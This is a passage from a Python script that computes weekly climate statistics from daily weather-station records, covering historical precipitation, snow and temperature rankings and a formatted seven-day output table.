clmt[c.year][c.month][c.day].prcpM == "T": w_prcpDAYS += 1 if clmt[c.year][c.month][c.day].snowQ in ignoreflags and clmt[c.year][c.month][c.day].snow not in ["9999","-9999",""]: w_snow.append(round(float(clmt[c.year][c.month][c.day].snow),1)) if float(clmt[c.year][c.month][c.day].snow) > 0 or clmt[c.year][c.month][c.day].snowM == "T": w_snowDAYS += 1 if clmt[c.year][c.month][c.day].snwdQ in ignoreflags and clmt[c.year][c.month][c.day].snwd not in ["9999","-9999",""]: w_snwd.append(round(float(clmt[c.year][c.month][c.day].snwd),1)) if clmt[c.year][c.month][c.day].tmaxQ in ignoreflags and clmt[c.year][c.month][c.day].tmax not in ["9999","-9999",""]: w_tmax.append(int(clmt[c.year][c.month][c.day].tmax)) if clmt[c.year][c.month][c.day].tminQ in ignoreflags and clmt[c.year][c.month][c.day].tmin not in ["9999","-9999",""]: w_tmin.append(int(clmt[c.year][c.month][c.day].tmin)) if clmt[c.year][c.month][c.day].tmaxQ in ignoreflags and clmt[c.year][c.month][c.day].tmax not in ["9999","-9999",""] and clmt[c.year][c.month][c.day].tminQ in ignoreflags and clmt[c.year][c.month][c.day].tmin not in ["9999","-9999",""]: w_alltemps.append(int(clmt[c.year][c.month][c.day].tmax)) w_alltemps.append(int(clmt[c.year][c.month][c.day].tmin)) except KeyError: continue c += datetime.timedelta(days=1) # indvweekdays complete above # The following compiles all time data to display ranks in the output prcphist = [] snowhist = [] snwdhist = [] tmaxaschist = [] tmaxdeschist = [] tminaschist = [] tmindeschist = [] tavgaschist = [] tavgdeschist = [] for YR in [YYYY for YYYY in clmt if type(YYYY) == int]: wc = datetime.date(YR,m,d) ws = wc - datetime.timedelta(days=3) wd = ws # current day we = wc + datetime.timedelta(days=3) tempwkli = [] # tempwkli = [datetime.date(2009,1,1),datetime.date(2009,1,2),datetime.date(2009,1,3),datetime.date(2009,1,4),datetime.date(2009,1,5),datetime.date(2009,1,6),datetime.date(2009,1,7)] while wd <= we: tempwkli.append(datetime.date(wd.year,wd.month,wd.day)) wd = wd + datetime.timedelta(days=1) prcpwk = [float(clmt[wkday.year][wkday.month][wkday.day].prcp) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].prcp not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].prcpQ in ignoreflags] prcphist.append(round(sum(prcpwk),2)) snowwk = [float(clmt[wkday.year][wkday.month][wkday.day].snow) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].snow not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].snowQ in ignoreflags] snowhist.append(round(sum(snowwk),1)) snwdwk = [float(clmt[wkday.year][wkday.month][wkday.day].snwd) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].snwd not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].snwdQ in ignoreflags] if len(snwdwk) > 0: snwdhist.append(round(sum(snwdwk)/7,1)) tmaxwk = [int(clmt[wkday.year][wkday.month][wkday.day].tmax) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].tmax not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].tmaxQ in ignoreflags] if len(tmaxwk) > excludeweek: tmaxaschist.append(round(mean(tmaxwk),1)) tmaxdeschist.append(round(mean(tmaxwk),1)) tminwk = [int(clmt[wkday.year][wkday.month][wkday.day].tmin) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].tmin not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].tminQ in ignoreflags] if len(tminwk) > excludeweek: tminaschist.append(round(mean(tminwk),1)) tmindeschist.append(round(mean(tminwk),1)) tavgwk = [] for evd in tempwkli: if checkDate2(evd.year,evd.month,evd.day) and clmt[evd.year][evd.month][evd.day].tmax not in ["","-9999","9999","-999","999"] and clmt[evd.year][evd.month][evd.day].tmin not in ["","-9999","9999","-999","999"] and clmt[evd.year][evd.month][evd.day].tmaxQ in ignoreflags and clmt[evd.year][evd.month][evd.day].tminQ in ignoreflags: tavgwk.append(int(clmt[evd.year][evd.month][evd.day].tmax)) tavgwk.append(int(clmt[evd.year][evd.month][evd.day].tmin)) if len(tavgwk) > excludeweek * 2: tavgaschist.append(round(mean(tavgwk),1)) tavgdeschist.append(round(mean(tavgwk),1)) """ print("{} - prcp: {} :: snow: {} :: snwd avg: {} :: tavg: {} :: tmax avg: {} :: tmin avg: {}".format( YR, "{:5.2f}".format(round(sum(prcpwk),2)), "{:5.1f}".format(round(sum(snowwk),1)), "{:5.1f}".format(round(mean(snwdwk),1)) if len(snwdwk) > 0 else "--", "{:5.1f}".format(round(mean(tavgwk),1)) if len(tavgwk) > 0 else "--", "{:5.1f}".format(round(mean(tmaxwk),1)) if len(tmaxwk) > 0 else "--", "{:5.1f}".format(round(mean(tminwk),1)) if len(tminwk) > 0 else "--")) """ prcphist = sorted(list(set(prcphist)),reverse=True) snowhist = sorted(list(set(snowhist)),reverse=True) snwdhist = sorted(list(set(snwdhist)),reverse=True) tmaxaschist = sorted(list(set(tmaxaschist))) tmaxdeschist = sorted(list(set(tmaxdeschist)),reverse=True) tminaschist = sorted(list(set(tminaschist))) tmindeschist = sorted(list(set(tmindeschist)),reverse=True) tavgaschist = sorted(list(set(tavgaschist))) tavgdeschist = sorted(list(set(tavgdeschist)),reverse=True) #for x in [prcphist,snowhist,snwdhist,tmaxaschist,tmaxdeschist,tminaschist,tmindeschist,tavgaschist,tavgdeschist]: print(x) if records_in_week <= excludeweek: print("") print("{:-^83}".format("*** WEEKLY STATS LIKELY UNDERREPRESENTED ***")) print("{:^83}".format("Weekly Statistics for {} thru {}".format(wkstart,wkend))) print("{:^83}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^83}".format("Quantity of Records: {}".format(records_in_week))) print("{:^83}".format("'*' Denotes existance of quality flag; not included in average stats")) print("{:-^83}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("",indvweekdays[0].year,indvweekdays[1].year,indvweekdays[2].year,indvweekdays[3].year,indvweekdays[4].year,indvweekdays[5].year,indvweekdays[6].year)) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("", "{} {}".format(calendar.month_abbr[indvweekdays[0].month],indvweekdays[0].day), "{} {}".format(calendar.month_abbr[indvweekdays[1].month],indvweekdays[1].day), "{} {}".format(calendar.month_abbr[indvweekdays[2].month],indvweekdays[2].day), "{} {}".format(calendar.month_abbr[indvweekdays[3].month],indvweekdays[3].day), "{} {}".format(calendar.month_abbr[indvweekdays[4].month],indvweekdays[4].day), "{} {}".format(calendar.month_abbr[indvweekdays[5].month],indvweekdays[5].day), "{} {}".format(calendar.month_abbr[indvweekdays[6].month],indvweekdays[6].day))) print("{:-^6}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}".format("","","","","","","","")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("PRCP", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcp if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcp != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcp if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcp != "" else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcp if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcp != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcp if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcp != "" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcp if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcp != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcp if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("SNOW", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snow if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snow if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snow if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snow if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snow if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snow if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snow if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("SNWD", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwd if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwd if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwd if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwd if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwd if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwd if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwd if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("TMAX", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmax if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmax != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmax if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmax != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmax if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmax != "" else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmax if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmax != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmax if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmax != "" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmax if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmax != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmax if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmax != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("TMIN", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmin if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmin != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmin if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmin != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmin if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmin != "" else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmin if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmin != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmin if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmin != 